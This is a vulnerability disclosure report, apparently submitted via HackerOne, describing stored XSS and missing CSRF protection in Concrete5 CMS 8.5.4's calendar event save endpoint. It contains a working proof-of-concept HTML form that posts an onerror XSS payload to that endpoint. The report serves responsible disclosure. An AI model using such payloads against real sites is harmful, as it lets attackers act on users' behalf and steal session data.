crayons
The description
parameter in the scenario /index.php/ccm/calendar/dialogs/event/add/save
is affected by Stored XSS due to lack of user supplied data filtration. Also in should be mentioned that this endpoint does not verify CSRF token ccm_token
, which leads to an ability to perform CSRF attack using specially crafted web page.
Concrete5 CMS version: 8.5.4
PHP Version: 7.2.24
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://<YOUR CONCRETE5 TESTING SERVER IP>/index.php/ccm/calendar/dialogs/event/add/save" method="POST">
<input type="hidden" name="caID" value="1" />
<input type="hidden" name="name" value="csrf_xss" />
<input type="hidden" name="description" value="<img src=x onerror=alert(document.domain)>" />
<input type="hidden" name="cID" value="0" />
<input type="hidden" name="event_repetitionSetID[]" value="1234" />
<input type="hidden" name="event_repetitionID_1234" value="0" />
<input type="hidden" name="event_pdStartDate_pub_1234" value="2/12/21" />
<input type="hidden" name="event_pdStartDate_1234" value="2021-02-12" />
<input type="hidden" name="event_pdStartDateSelectTime_1234" value="11:00am" />
<input type="hidden" name="publishAction" value="approve" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
This bug was found as a part of Solar Security CMS Reseach, with https://hackerone.com/d0bby, https://hackerone.com/wezery0, https://hackerone.com/silvereniqma in collaboration. Can you, please, add them to this report?
Malicious attacker can potentially obtain sensitive information or make action on user behalf.